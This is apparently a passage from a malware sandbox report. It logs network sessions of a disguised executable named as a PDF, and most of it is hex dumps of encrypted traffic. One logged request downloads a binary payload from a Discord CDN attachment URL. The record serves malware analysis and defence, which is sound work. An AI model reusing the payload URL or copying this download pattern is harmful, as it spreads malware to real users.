                                                                            2021-12-01 15:22:56 UTC 41 IN Data Raw: c5 26 de d6 e4 e4 42 26 5b 50 a0 e9 df 3b 6a cd 9b 5c 52 35 fc a8 a2 07 6a ff c5 cc 2b d1 e5 0c f8 47 9d 73 7c e8 c5 bb 57 42 86 31 cf fa 31 d2 cd 47 14 16 0c 72 a1 0f f1 1e 0a 62 8f 34 2a d7 d1 6e ba 91 3f 07 23 ef 98 de 36 00 b3 fc da a4 e7 cb 54 a5 e2 02 28 51 34 46 9d 76 81 b1 1d a3 ec f7 d0 01 27 38 74 ed b6 bf 23 e0 1a 0d 63 4d 90 76 03 a8 99 d4 f5 da a8 48 71 63 49 9c 11 85 51 a0 e3 8e 52 b1 05 86 48 7c 28 50 a6 f9 4d 17 19 b6 a9 81 32 5c d3 72 ee aa fe 9e 62 42 8a 13 85 21 2e 4d 03 a6 66 48 06 f1 b2 b7 32 b9 bd 4b 64 d6 e9 b3 e5 1c f8 56 53 cd 0e 79 95 c0 b0 71 58 a0 71 6a e3 3f 0b eb 3d f2 cf 84 76 fc 5d 41 13 08 81 5c 2b 47 5b ad 73 33 4c 3e e8 db 05 09 ec 78 ec 26 2c 44 48 88 34 48 97 51 af 78 51 30 4f fc 4a 66 f4 c1 27 9f eb b9 29 94 83 be a0
                                                                            Data Ascii: &B&[P;j\R5j+Gs|WB11Grb4*n?#6T(Q4Fv'8t#cMvHqcIQRH|(PM2\rbB!.MfH2KdVSyqXqj?=v]A\+G[s3L>x&,DH4HQxQ0OJf')
                                                                            2021-12-01 15:22:56 UTC 42 IN Data Raw: f9 c2 43 75 44 6e 56 9b 98 db ea fa 5e 0b 6a c9 c1 1c ee 29 71 77 a9 92 18 c8 d4 20 37 92 df d5 ad 16 0a e7 0b e9 f3 35 6d 71 e4 8d a7 63 c1 54 3f f4 44 41 0e 7e d7 6d 73 65 8a b7 bb 5c 29 a0 c1 58 a9 07 ba b5 12 ee 34 47 1f 5c 3e a9 81 5b ca 8d f7 db 98 41 de 11 03 f9 90 bb d2 b3 23 a7 fb c8 5c e9 58 59 c0 2f 85 44 f0 62 7b 20 61 05 3f 52 17 ee da 65 0d e7 cb 19 8f c6 d4 76 85 aa 29 ba 55 d3 cf 3c ec b3 87 2b 5d c1 c0 2a c0 36 e5 12 8b 24 a4 f2 b2 dd 0e 89 f5 4b 9a 6c 68 71 30 ab 8f 44 4f 38 71 62 2b 29 4c 64 cf e2 f0 39 66 2b 9d 6e 07 4e 29 39 8d 3d bc 76 01 4f 3a 3a 27 79 95 ca 56 c8 c7 ce c8 d0 79 32 5e d1 79 75 99 36 5c 50 3b e5 73 ee d8 cd bc 6b 73 98 d7 e5 b4 de cc a9 15 91 3a 41 95 fc b1 5b 90 a6 53 bb 14 ce c8 a2 78 7c 87 9f dd cd cf fe 7e 88 18
                                                                            Data Ascii: CuDnV^j)qw 75mqcT?DA~mse\)X4G\>[A#\XY/Db{ a?Rev)U<+]*6$Klhq0DO8qb+)Ld9f+nN)9=vO::'yVy2^yu6\P;sks:A[Sx|~
                                                                            2021-12-01 15:22:56 UTC 44 IN Data Raw: 58 36 40 d4 77 aa 83 3f 42 9b ff c0 32 c7 d7 fe 14 fb c8 c9 46 18 97 33 c1 52 ac 6a 09 9a 32 a8 96 42 84 a3 7a ea 3a 76 1e ce 04 bf 52 bd 2e 41 94 1f 53 31 ca d1 e7 12 f4 45 13 92 a3 12 e2 42 74 92 50 bc 3b 72 1a 10 1a 05 bf 8b 56 76 1c a7 7e 80 f3 25 29 59 25 ae 94 bf dd 67 d2 ac 68 fc 49 06 1e d5 94 ba c5 0e 5b 58 a8 18 6a 71 ea 52 69 da 7f a7 95 cc c2 d8 76 80 2c 53 3f f5 49 88 65 a6 8f 38 39 dc 0a ee 21 28 7d 41 1f bf 3e 97 32 bc 94 d7 16 0c e5 77 71 2b c4 a8 81 b3 87 db 70 03 88 b6 c4 3c 07 7b 7f b4 dc e4 92 10 81 fc a4 9a d9 83 51 cb f6 4c 70 67 94 51 ba 2c e8 33 db 9b 64 1a 1c a9 c4 dd 07 af 43 84 e3 c1 d4 60 9a d1 6c e6 c5 4e 2e 52 a8 48 23 7a 14 13 8a 31 02 f8 b7 3f e0 5e 51 7e 0a f8 c1 17 19 ac 87 a1 82 30 43 1d b6 77 94 df 5a 06 ea b9 3d 80 06
                                                                            Data Ascii: X6@w?B2F3Rj2Bz:vR.AS1EBtP;rVv~%)Y%ghI[XjqRiv,S?Ie89!(}A>2wq+p<{QLpgQ,3dC`lN.RH#z1?^Q~0CwZ=
                                                                            2021-12-01 15:22:56 UTC 45 IN Data Raw: 04 04 ca 53 a4 75 06 13 91 27 51 d5 23 19 8e 44 97 52 da f3 3b db 44 e3 13 52 5e 68 a5 a4 70 f0 2f 1f be 66 6d f4 bc b6 46 63 a8 d8 cf 7a 15 8a b1 6b 67 d9 f5 da 72 76 34 48 97 cd ae 6a 05 3e 14 27 a5 e6 9d 18 16 7b 92 9a d3 fe 59 b5 a6 a5 e3 8e 53 b7 2c d9 8e c7 c6 39 3b e0 f7 3c fa dc 1a f3 5c 97 8a 2a 5c d8 7b ed 43 80 98 9e 6f 63 53 82 5f 93 5b c6 4e a2 fc 16 6e f2 2b d0 04 1e c8 82 49 6a f7 ca 5c 57 c2 5f 35 f3 12 77 5f 45 85 ad 17 50 a4 f0 38 66 1c dc 8b 3f 37 fa 52 b8 38 44 82 85 87 61 44 09 e1 91 2c a7 0c 1c c7 a8 dc b6 c9 4e bd b1 6e 01 d0 02 f7 36 87 4c c3 45 7b 94 49 92 c2 c3 b4 54 c2 13 ee 26 3a ea b9 35 04 07 3e 94 35 f3 b0 1d 3d f3 21 ce 00 72 ec f4 42 f8 5e 56 36 e0 81 39 2d 30 54 6d 65 d4 b3 ac 8b b4 bc 53 c7 25 c0 95 c8 c0 24 44 8f 3c 86
                                                                            Data Ascii: Su'Q#DR;DR^hp/fmFczkgrv4Hj>'{YS,9;<\*\{CocS_[Nn+Ij\W_5w_EP8f?7R8DaD,Nn6LE{IT&:5>5=!rB^V69-0TmeS%$D<
                                                                            2021-12-01 15:22:56 UTC 46 IN Data Raw: bc af 0a 7b 00 cc cf 9e e4 9c 0a e1 96 4f cc 58 c8 65 43 03 7e ff 85 6f 26 26 21 37 91 35 0a 1b 27 e0 e0 78 f2 02 20 0e 33 36 f6 1e b9 46 9e 6b 75 95 2f 7e 33 09 6e f0 2f cb a6 f9 54 b9 3f e9 a4 95 fd 43 10 00 c5 5a b1 d5 f1 39 f7 ca c7 56 e0 2b 94 49 0c 72 31 cd d5 70 71 81 b7 dd 58 b0 72 19 e6 9e 63 4f 23 a2 75 d8 d4 8c 24 2c cd 2d 34 d3 11 42 81 0f f1 58 2b 9a bc 9f 64 4b 12 99 42 92 a2 bc a7 f9 d1 70 7b d4 e4 0d 6c e5 79 53 3d 14 e7 f3 ca a7 fa 57 b8 8e af 94 7d 58 e2 97 9f fa 5c db 9b 6c 71 61 a3 16 f7 9f a0 06 e9 bd b0 1f bb c0 d8 8f 9b fd c1 d1 ff c9 de eb a6 7b b8 55 dd 74 ac a5 ae 92 58 2b 5c d6 11 6b 3e 6d 36 7e 04 6f 58 05 4a 8a 2f c8 cb b2 12 51 d7 05 a7 ec 21 10 2f 2d ac e9 e8 c8 4a f7 5c 94 a7 e5 89 ae 77 21 9c b4 ba ae 80 10 f8 c7 cb 35 f6
                                                                            Data Ascii: {OXeC~o&&!75'x 36Fku/~3n/T?CZ9V+Ir1pqXrcO#u$,-4BX+dKBp{lyS=W}X\lqa{UtX+\k>m6~oXJ/Q!/-J\w!5
                                                                            2021-12-01 15:22:56 UTC 48 IN Data Raw: 82 3b 13 61 3d 81 bc aa 9c e0 7a f6 c6 ef ad 8e 69 74 fc 47 f6 9b f1 28 07 7e 13 88 28 9a 5b b8 f0 2b 93 d5 69 e2 60 cf e7 0e 90 5e dd 86 3c 97 35 ba cd 0a e5 96 94 5d 9d e7 f2 6a 84 39 f7 4a f6 c2 b2 62 cc fb af c5 48 7c 83 e0 1f aa 9c 77 77 ea 5c 9a 48 97 5b 34 5e 45 8d 2b d1 72 e8 2c b6 46 d4 89 e9 a2 69 ea 0d 76 94 58 a8 6c e4 92 2f c0 a4 65 8b 41 07 68 ff 5f d3 71 64 c5 4a 7b 01 bc bd cc 3f ac 99 dd 9f f4 c8 f9 cf e4 36 6f f4 00 c5 54 be 23 25 ba 5f b3 47 5c b8 bb 34 d8 81 b7 e6 06 65 d8 fc 43 1c 3d 29 cb be 99 01 09 79 90 c1 3c 6c 6d 54 3a 7f 9a 44 94 a0 93 9c 8a 6e f5 d2 38 97 d1 6d 77 0a 75 93 c4 d7 6c 1b 37 70 e8 c5 a0 02 c6 db 8d bb bc 52 a5 03 8c 6d 27 c3 5e d1 ef c2 79 46 91 45 86 2f c4 ce fb 07 7d 6f 24 91 97 cd 42 0a dd 89 3b 78 9d fd cb 42
                                                                            Data Ascii: ;a=zitG(~([+i`^<5]j9JbH|ww\H[4^E+r,FivXl/eAh_qdJ{?6oT#%_G\4eC=)y<lmT:Dn8mwul7pRm'^yFE/}o$B;xB
                                                                            2021-12-01 15:22:56 UTC 49 IN Data Raw: 9c ed bf 2a 43 1d b6 80 97 c9 48 86 2a 55 e3 11 0d 24 2b d2 f6 1d 1f f9 d4 e1 04 2e 4d c0 bf ab 4f 03 6e f5 db 62 3e 15 75 d6 eb b2 3e 52 53 a6 f9 a0 77 9c 76 f9 4a d6 ad 04 e2 0b 96 a1 3d 75 03 73 79 9c 7d c2 fd 80 07 75 5b 51 b0 17 c0 aa 87 bf df 07 ed ca d7 67 50 5d a7 ac c1 29 d4 e9 7e 1c ad 4a c9 51 39 e1 73 f2 c0 28 de 04 1f 2f 44 ec 27 b0 90 a2 90 aa a9 9b f3 a0 f6 62 ca f7 e5 64 da e3 12 76 e6 93 b9 ef bf cd d1 34 a2 59 ef af e4 1e 3b 10 51 97 81 b9 34 ff ac 1e 47 0f 0f f1 b8 93 e4 90 d9 5c c8 dd 80 f4 cb 7e 89 e9 4c ea 6f c9 50 7a 72 11 12 5d df df 75 8f c6 d4 1a a5 d3 b4 b5 3a 74 e3 63 c6 4b 20 35 f9 d4 17 44 00 51 62 cb 42 90 2c 8c 56 ad 1f c7 3b 0c f5 c4 33 8e 56 d9 6f 69 ee f3 be 3f 88 3f 73 ea 44 2a 57 34 05 4d 0e 11 8d 31 7b 81 3b da f0 bd
                                                                            Data Ascii: *CH*U$+.MOnb>u>RSwvJ=usy}u[QgP])~JQ9s(/D'bdv4Y;Q4G\~LoPzr]u:tcK 5DQbB,V;3Voi??sD*W4M1{;
                                                                            2021-12-01 15:22:56 UTC 50 IN Data Raw: 0e 80 b9 f7 66 61 84 a0 12 f8 21 e0 d1 74 70 69 38 91 b4 b8 ca 30 21 f6 bf b2 9f 3c 79 f5 53 64 55 7a e6 5b 19 52 4f 98 3d fb 5e b3 39 c5 bd 7d 48 4a b6 a5 dd 87 d2 3d ef 2a eb c3 dc 32 e8 87 59 67 32 3c 9f 3c e7 ed 3a c6 b9 f7 a7 db 3c a2 13 74 9b 24 60 45 ae 27 93 e9 bb 95 54 eb 4f b8 b6 ee 20 dc b0 2a 88 d2 76 9b c8 d4 15 0f fd b1 7d 83 e2 21 04 cf 32 5a ba 41 56 00 fc d9 34 5e ea a9 49 9b 1d 10 94 b6 6d 3c f9 50 48 51 15 3d 47 aa e2 27 52 53 5b 44 6d b4 41 14 c5 b0 e7 55 f4 20 67 9e 02 4f 77 75 98 f6 15 18 ff d3 22 c4 66 af 32 2e 43 c6 20 ac 03 52 51 f8 ae 57 61 d1 9b ac af 04 af 0a 58 74 c7 a5 bf 22 11 4c bb 39 18 7e f2 8e ad aa df ca 25 9a 4e 2e f7 a5 4a 8d d6 33 c8 06 65 bd b9 19 72 52 0e 83 b7 57 2e 64 9a d4 79 04 69 85 54 47 80 46 7d ed 8c 40 96
                                                                            Data Ascii: fa!tpi80!<ySdUz[RO=^9}HJ=*2Yg2<<:<t$`E'TO *v}!2ZAV4^Im<PHQ=G'RS[DmAU gOwu"f2.C RQWaXt"L9~%N.J3erRW.dyiTGF}@
                                                                            2021-12-01 15:22:56 UTC 52 IN Data Raw: 09 71 d5 59 e8 4a ca 56 b6 5a 4e 34 cf 43 8d 31 8e dd 13 dd 1a 8a 2b 5f c1 52 2f 48 93 49 94 1e 27 a4 61 a9 8f 40 4f 2b d1 79 71 0f 0a a2 62 d7 6f 63 70 7f ca 24 21 b6 b6 f4 07 ac 97 ce 6e e6 93 ef 4f a6 6f ad f4 82 f6 57 6a 6b 83 c7 b6 44 d4 b8 96 45 13 6b 49 d8 77 9c 79 02 c0 b6 fb 88 c2 23 27 ec cf 48 10 6a 33 fc 0d d4 b2 5e cc 2b bc ee 17 b7 9e 8d 38 01 c2 98 53 30 46 89 56 5d fd ff 02 f7 df 91 d4 06 7f 1d ba b7 3c 6b 8e 92 cc 50 a0 77 9c 76 6e f5 9e 70 e4 82 51 2c 2d 0a ae 8d a9 95 80 90 88 36 e2 09 7f 19 f8 47 13 95 42 82 a9 99 5d cf 75 06 83 aa 81 ba 2c 6e ee c2 d9 61 48 99 59 45 14 1e 25 e9 90 32 59 2f 60 4f 81 45 12 1a 02 78 39 f0 21 b6 21 51 2a c9 95 d3 b2 95 56 24 23 a8 90 46 7e e6 9d aa db 82 32 55 5f 22 54 bb 34 8b a2 fb 97 c4 d4 eb b4 4e 38
                                                                            Data Ascii: qYJVZN4C1+_R/HI'a@O+yqbocp$!nOoWjkDEkIwy#'Hj3^+8S0FV]<kPwvnpQ,-6GB]u,naHYE%2Y/`OEx9!!Q*V$#F~2U_"T4N8
                                                                            2021-12-01 15:22:56 UTC 53 IN Data Raw: 33 c0 1e 18 16 04 fd ca 1d b0 3d d0 7c 1c 38 70 30 af ba de 11 89 a5 f9 05 80 93 8a 6b 6a f6 4a 26 5b 80 1c 0d f2 9e 94 48 8a 2f cb 47 1e d5 9d 0a 15 bf 71 e9 c4 3b 80 6e 36 59 bc 54 24 65 cb ce ef 52 49 f7 49 de 0f 05 56 d7 74 ee 32 dc b1 02 6c e6 ea ef 68 70 74 fb d0 e0 1d 21 9e ac 49 12 7a 85 84 0c 22 4a 77 84 a3 75 87 2b 20 34 ce e8 24 7c 0f 94 8e a5 77 61 50 5f c5 c9 56 b3 10 19 65 54 8c ba 36 9b 35 85 42 92 a5 97 7b f0 21 b6 21 39 e9 aa 9c 7d 8f 58 b4 13 a0 e9 d8 ed 22 e5 97 29 eb ab 18 16 12 10 80 91 d6 f0 2c 56 71 73 94 d1 e9 6c 06 f0 2e b2 e1 82 27 a6 6c 1a f4 3e 87 30 d0 2f 24 31 cb b0 b0 8f d8 e3 8d 54 4c b8 46 67 f0 44 60 3a 1b 59 7e 24 e8 d7 e6 40 9a df 57 3c f6 75 4f 2f ca cf 7d 5d c4 43 87 c7 57 24 32 dc 2e b4 58 a9 0b 7f 5c 78 81 d3 9e 65
                                                                            Data Ascii: 3=|8p0kjJ&[H/Gq;n6YT$eRIIVt2lhpt!Iz"Jwu+ 4$|waP_VeT65B{!!9}X"),Vqsl.'l>0/$1TLFgD`:Y~$@W<uO/}]CW$2.X\xe
                                                                            Session ID Source IP Source Port Destination IP Destination Port Process
                                                                            1 192.168.2.3 49751 162.159.129.233 443 C:\Users\user\Desktop\DOC209272621615.PDF.exe
                                                                            Timestamp kBytes transferred Direction Data
                                                                            2021-12-01 15:22:56 UTC 57 OUT GET /attachments/900622540588843013/915461671072432149/Wkklnmczcyrsyafzucgflytssyuynbb HTTP/1.1
                                                                            User-Agent: aswe
                                                                            Host: cdn.discordapp.com
                                                                            Cache-Control: no-cache
                                                                            2021-12-01 15:22:56 UTC 57 IN HTTP/1.1 200 OK
                                                                            Date: Wed, 01 Dec 2021 15:22:56 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 281088
                                                                            Connection: close
                                                                            CF-Ray: 6b6d50560d15692b-FRA
                                                                            Accept-Ranges: bytes
                                                                            Age: 36009
                                                                            Cache-Control: public, max-age=31536000
                                                                            Content-Disposition: attachment;%20filename=Wkklnmczcyrsyafzucgflytssyuynbb
                                                                            ETag: "95c7205834a4a92a4f9bfc212c2326dc"
                                                                            Expires: Thu, 01 Dec 2022 15:22:56 GMT
                                                                            Last-Modified: Wed, 01 Dec 2021 04:37:50 GMT
                                                                            Vary: Accept-Encoding
                                                                            CF-Cache-Status: HIT
                                                                            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                            x-goog-generation: 1638333470898312
                                                                            x-goog-hash: crc32c=meGuLw==
                                                                            x-goog-hash: md5=lccgWDSkqSpPm/whLCMm3A==
                                                                            x-goog-metageneration: 1
                                                                            x-goog-storage-class: STANDARD
                                                                            x-goog-stored-content-encoding: identity
                                                                            x-goog-stored-content-length: 281088
                                                                            X-GUploader-UploadID: ADPycduUlNf2PA7zKpv-QoNOOzrwHgbFRX6mQZp4zDQlyL3kPqYyPZgI-KJkcPR2dvSRCq08DP8GeNCAFObtI59ESkwHkFkhMQ
                                                                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                            Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FOtsGpIgF2x7nGNxmrGUjgXncTIJSGkvLKzfeQyYUe6FVDAbkAsVU9sPg8hB6rHVqlDUm%2BiqcmRf5974oGRhvmVQSn8l3rgEvw3Xp2K77IPg97X4Rhnr7FVLb2iwPzCbK4tUyA%3D%3D"}],"group":"cf-nel","max_age":60
                                                                            2021-12-01 15:22:56 UTC 71 IN Data Raw: e4 04 ff 2b a3 18 c0 a6 6c 27 a7 ee 3e 7e 97 5e df 8e 51 31 3b 7c 51 2d ce ff ca 25 e9 04 2a 44 94 92 46 08 69 33 cf 6f 76 ff 52 2f c9 5e d2 f6 a3 a7 49 d0 f9 dd 14 60 76 e5 0e 78 ff 55 69 93 bb 7f 27 0f f1 26 c2 9d d3 51 cf ec 72 74 63 5b c7 43 8e a3 f0 c9 bc 49 9a 0f f0 4f 2b 47 64 cd 41 17 92 68 ca d2 5f 53 34 44 99 da 93 48 28 c7 92 44 15 89 95 f5 c2 52 c9 52 b3 01 4b 6f 0b 7b 0d 2f cb 40 66 c2 c5 45 8f 0c f6 d1 a5 e7 11 9b 92 31 d0 68 8d a4 67 48 94 73 12 0f 1a 4e ba b7 3a 7f 81 be 38 af 08 75 59 31 5c 77 83 22 3f 8d c6 c9 c2 af 00 c4 d5 69 4f 51 28 de 53 23 a9 1f ba bb 20 b1 d6 f0 a4 be b9 b4 a4 54 d1 67 d8 ad 14 11 90 5e e1 e1 96 c5 2c 54 b7 35 e1 94 57 b7 e1 85 25 74 1c b2 83 8b ca c9 c6 9d fb ca cc c6 e7 ec 25 36 31 c3 54 af 00 cf 78 81 72 0e 87
                                                                            Data Ascii: +l'>~^Q1;|Q-%*DFi3ovR/^I`vxUi'&Qrtc[CIO+GdAh_S4DH(DRRKo{/@fE1hgHsN:8uY1\w"?iOQ(S# Tg^,T5W%t%61Txr
                                                                            2021-12-01 15:22:56 UTC 72 IN Data Raw: da 75 40 62 fb cf 95 42 e0 11 90 57 34 f2 eb 20 20 bf 5d e8 fb c3 69 7a 09 f3 e5 83 b8 b2 80 93 08 ce ec 57 2d ce 71 14 1f ae 88 20 bf de 89 a7 89 cf 6f 54 8a 3c d7 11 07 7e 80 4c 86 3d fb cd d1 a4 3c 7c 60 bf 32 e1 f1 3f 2e 35 ce fa 48 e7 8e b3 81 f6 5d 5f 53 33 5b b9 69 60 5d 2e 40 78 10 14 b4 45 3b e2 82 33 7f 72 ec 0f 9b e4 81 f0 2c 53 33 cc 46 4d 27 b2 ea 57 22 1b d4 ed 08 ee a9 f0 6f ee 66 d9 6f 69 79 03 8a 75 86 1c 5e dd 24 20 ab f8 5d 35 fc ad 8a 61 43 0a f0 2c e9 6e cf 6c 66 33 8a 92 8c c8 55 f1 bd 18 02 e3 17 c0 b8 b3 0c fe d6 30 23 af 3f e0 01 29 ab 0b e5 cc c4 d1 70 eb 2f 2b 8c 38 48 b4 a3 4e be 3f 0c e7 0e 5f 4e ba b3 0a 67 b9 6f 72 d0 95 d3 cb 40 fb 2e 07 44 91 23 27 d6 ef a2 76 1c 8d 64 e8 24 95 13 63 df 43 14 80 d4 ed 84 3a 67 d3 3b ea 36
                                                                            Data Ascii: u@bBW4 ]izW-q oT<~L=<|`2?.5H]_S3[i`].@xE;3r,S3FM'W"ofoiyu^$ ]5aC,nlf3U0#?)p/+8HN?_Ngor@.D#'vd$cC:g;6
                                                                            2021-12-01 15:22:56 UTC 73 IN Data Raw: 1b 0f 26 85 56 cf e9 27 27 24 3a 75 d2 18 c1 50 a8 59 38 f9 e6 cb 60 d4 e1 00 49 34 ab ee 60 8f 10 02 f1 35 7b 9d f6 25 45 17 41 17 0a dc cf 5c d0 e3 72 7e e7 13 62 57 5a 70 2d d8 fc d8 8f 71 fd fa 8c 38 ea 35 32 97 a5 67 58 aa 82 3b e0 96 4e 6a 46 1f 37 ff 72 8f 4d 6c 2b c3 df 25 01 54 a8 9a 55 f7 c4 78 ac ff 1d b9 d9 97 79 f2 c9 d9 2c ae bb b7 e0 b0 92 cd 4d db dd 00 5c cb e7 e5 0c b3 f0 ea 6a e3 8d 37 1a 10 82 48 5b 10 89 a9 0d ba a8 06 f7 04 8a ad c0 be 3f 6b cd 4c 82 33 24 d1 3f 54 60 d6 e9 24 09 d4 fd cb 41 e7 79 ac 3d 2e 5c df 04 c4 78 0d 7b 88 bf 11 80 b3 63 c6 2e 5a 3c 41 13 97 ca cf f8 e4 a3 fe 92 50 02 0f 31 da 36 7d 1a d2 4d 18 89 6e 55 29 cd 93 dd 2e bf 85 ac 4d 1b 2c 88 83 b7 bb fc e6 00 db 5e c7 e5 6a 5d 49 c1 5a 31 19 28 5b d2 24 89 b3 13
                                                                            Data Ascii: &V''$:uPY8`I4`5{%EA\r~bWZp-q852gX;NjF7rMl+%TUxy,M\j7H[?kL3$?T`$Ay=.\x{c.Z<AP16}MnU).M,^j]IZ1([$
                                                                            2021-12-01 15:22:56 UTC 75 IN Data Raw: 37 e4 0b 7c f9 4a f1 52 d4 0f 3b da 10 85 c0 5f 3f b7 ac 0d e0 dc 8d 98 88 63 cc a2 21 5c 42 61 d6 95 4b 4a 09 64 cd 42 6e 0e ad 25 6e ea 23 ac 94 af 97 4f e0 1b b3 1d 4b d7 f7 4b dd 93 de 05 04 6b b9 3a 68 3b e8 3f e3 8e cd 18 d1 7c 1d b9 f3 ac 70 8d 26 fc 40 7b 8a 27 d9 bb e7 82 35 5a 9a 8c 3b f7 dc 1d 5f c0 3a bc af 08 e3 68 39 70 71 a8 80 06 ff bd ca 01 42 95 6a 8a e4 07 77 9c 7d 71 f3 31 0a e3 8e 53 cf 14 86 70 e4 1d be a9 c0 21 f8 97 c9 51 38 38 ca 03 7e 01 d0 22 3b 6b 46 d3 67 5c d0 5d 6c 6f e3 4c 82 2e 55 d6 12 d6 db 1e 1f 0f 9b 63 c0 8d 39 71 34 da 6b 5d 8e cb d0 ce 3b de 8c f5 ce e4 01 e3 82 bd b8 67 41 1b b9 ac 09 b9 3e 76 1b 20 b0 0b a1 6c 7e 93 e2 87 27 11 2b 6f 6f fd 5c 44 04 76 8c be 2c 0e 74 62 8a d2 74 6b e0 d6 da 6a 86 90 5e 41 83 c2 40
                                                                            Data Ascii: 7|JR;_?c!\BaKJdBn%n#OKKk:h;?|p&@{'5Z;_:h9pqBjw}q1Sp!Q88~";kFg\]loL.Uc9q4k];gA>v l~'+oo\Dv,tbtkj^A@
                                                                            2021-12-01 15:22:56 UTC 76 IN Data Raw: 5c 4d 4a 7a 73 57 d1 e7 cb a1 74 20 2c a2 e1 bb 56 a0 68 fb 50 b1 0d f1 39 f1 a0 75 67 bc e1 cd 5b 5e d3 eb 31 2b 2c 52 bb 01 db 32 04 71 7c 0f 94 c1 c0 44 7a 16 0f 64 5a f8 74 bd 2a 5e 26 aa c5 1e a1 ff de ed f9 85 5e d3 71 a8 84 a1 70 cf 97 cc c5 b3 ff 83 9f 39 f5 d3 f1 c6 2c cd 7a c2 ca c7 40 68 20 de e5 b4 29 17 9b f9 d7 6e e8 3c 62 b6 88 ca c7 4c 17 bd 33 5b de d8 fb de 0f 0e 47 4f c9 47 15 6e 7d 06 f4 c1 cc 04 fb cd 46 82 1b 52 4f 3a 7f 59 3e 97 24 ca 86 3b ff dc 17 12 7a fa a0 87 44 6b 14 f5 17 9b 34 a9 84 c3 79 c8 ba 3b 5d a3 63 f8 ac 0c 9a db 17 92 a8 0e 3a 31 dd 97 da 7e 0a 3a 82 ae e7 96 a4 7d 8e 51 fd c3 35 64 dc e2 00 c7 53 35 f9 d5 d4 df 69 9b 93 42 01 f3 4e a5 e3 7a ea 55 b8 b5 c4 d2 f7 d0 e0 1d bc e0 06 fb cb 42 05 e2 f2 c7 57 26 46 9e 6c
                                                                            Data Ascii: \MJzsWt ,VhP9ug[^1+,R2q|DzdZt*^&^qp9,z@h )n<bL3[GOGn}FRO:Y>$;zDk4y;]c:1~:}Q5dS5iBNzUBW&Fl
                                                                            2021-12-01 15:22:56 UTC 78 IN Data Raw: bc c6 64 a2 f7 91 27 c9 de b5 b3 96 64 20 a6 26 d6 61 99 c1 9e 79 72 da 7e 8d b8 b0 34 77 1e 56 b6 00 5f 4c 94 48 8f 0f 5e 2f 52 21 b3 18 1c 3a e6 82 db 86 23 b3 9e ef a0 71 6b 73 f9 4e 3c 7d 8e 5f 13 a5 7a 16 05 f5 bc ad 2c 5b 44 9f fb 2d 3a 1a c6 de d8 0a df 52 0b 66 2f b7 4a 7d 0c ac 15 c6 2a 49 11 91 25 28 ab 0d 89 2f bf 34 d4 5b 53 37 fa c0 77 8e c4 d5 70 64 2c 52 bb 32 b2 20 4b c1 5f 4d 0e 0f 7a 81 21 e4 1b b1 01 fc 24 cd 2f 47 1d 12 07 a5 e2 6a 69 7f 58 a0 be bc 67 d6 7e 1a cf e6 56 d5 64 ce ff fb 0a 16 0d 60 62 f7 12 08 fe 5a ad f5 4e ed c0 a1 e3 99 25 6b ec ae f8 5e d1 76 24 d1 88 28 5f cd 89 b0 49 05 ad 01 cf e7 cb 59 27 ac 62 2f 82 1f 46 8a 24 ea 3a b1 1f 27 32 0b 6f 7d 89 52 40 17 d6 0a ef a2 e3 d3 3e 72 ff c2 20 73 47 eb b2 86 0e ee 28 59 22
                                                                            Data Ascii: d'd &ayr~4wV_LH^/R!:#qksN<}_z,[D-:Rf/J}*I%(/4[S7wpd,R2 K_Mz!$/GjiXg~Vd`bZN%k^v$(_IY'b/F$:'2o}R@>r sG(Y"
                                                                            2021-12-01 15:22:56 UTC 79 IN Data Raw: ef aa 53 28 33 50 77 82 3b ee e3 93 60 d7 02 67 9d fc 4f 3e c8 df 32 42 fb 4f e5 9c 7e 0a 39 f4 89 bb 1f 3d 6a 3b f7 d4 ea 73 1c ba b6 bd bd ba a4 63 4e b2 79 0a 77 d7 98 28 88 21 bf 3d 17 40 f3 81 bb 2c 55 29 96 74 65 44 96 cd 1c bc a6 7d 86 d6 a5 29 20 34 4f b3 36 9a 84 30 ce c5 8a c9 d9 eb d9 85 21 34 5a a7 e4 0a 0b 23 0f 62 c2 c6 12 1a 84 db f0 d5 f0 ad 15 8f dd 9d 1c 7e e5 11 1d e0 ec a1 bd 3d e0 08 eb 47 63 a0 86 22 34 82 3e fa c5 76 ff 53 a0 7d 88 2a 5b ae f5 c1 a0 7e 1b 2d e4 e9 72 ff 56 fa 89 b1 01 40 95 41 8e 53 35 f9 d4 08 d1 30 bf 37 fb 0e 11 1e ae 5d 5c d1 6e 16 91 fb df 96 4a 82 db db de ef aa 9c c3 6c 14 8b 21 55 29 d6 f5 2f 43 40 64 d5 69 77 77 a9 83 40 69 61 40 b6 b8 52 b1 69 e1 7b 83 ab 16 dd 97 d4 e3 09 f0 d6 f3 a6 6e 66 47 d8 e5 8e 44
                                                                            Data Ascii: S(3Pw;`gO>2BO~9=j;scNyw(!=@,U)teD}) 4O60!4Z#b~=Gc"4>vS}*[~-rV@AS507]\nJl!U)/C@diww@ia@Ri{nfGD
                                                                            2021-12-01 15:22:56 UTC 80 IN Data Raw: 25 57 3a 18 9c a0 6e e0 08 22 23 6c f3 c7 cc 5a 78 15 43 03 13 1b 20 f5 d9 a6 65 2e cd 18 f0 2e c5 49 63 dc 3a b9 29 10 15 b7 ad 35 21 a7 39 ff ab 98 7f 5c da 27 a1 89 35 c7 9c 75 5c d0 c9 c1 66 2c 53 c5 45 24 a1 dd 57 31 08 eb dc 90 30 81 b8 74 ee 16 84 48 58 ba 60 c8 00 55 b3 66 07 f8 76 d7 6c ff de 53 36 fc 4d 05 b7 3f 22 3d 6e 79 5d 50 a5 ea dc e6 45 fe c7 5f 44 46 96 dc e9 c5 a6 f2 bb e0 12 10 1e d7 2f ad ec 35 f3 2b 4f ef ad 1c 25 5c 28 27 d9 26 23 a1 63 1a cd 44 9c 7c c3 59 3d e7 92 a8 a2 a3 72 e8 27 61 41 c2 c4 4d 8c f3 a0 71 6c 0c 13 dc fa d1 73 64 50 d4 66 16 08 7c 86 60 20 bd 73 a5 f8 51 3b 01 32 97 35 f4 46 58 a3 7d 02 bc 4c 16 9f 33 d7 68 fa a0 04 3d 0d 66 cd ce a7 26 34 5a a7 1c cf 0e 45 50 bb 2a 9a 46 01 cd 3e 94 d9 f1 60 c9 44 81 47 57 ba
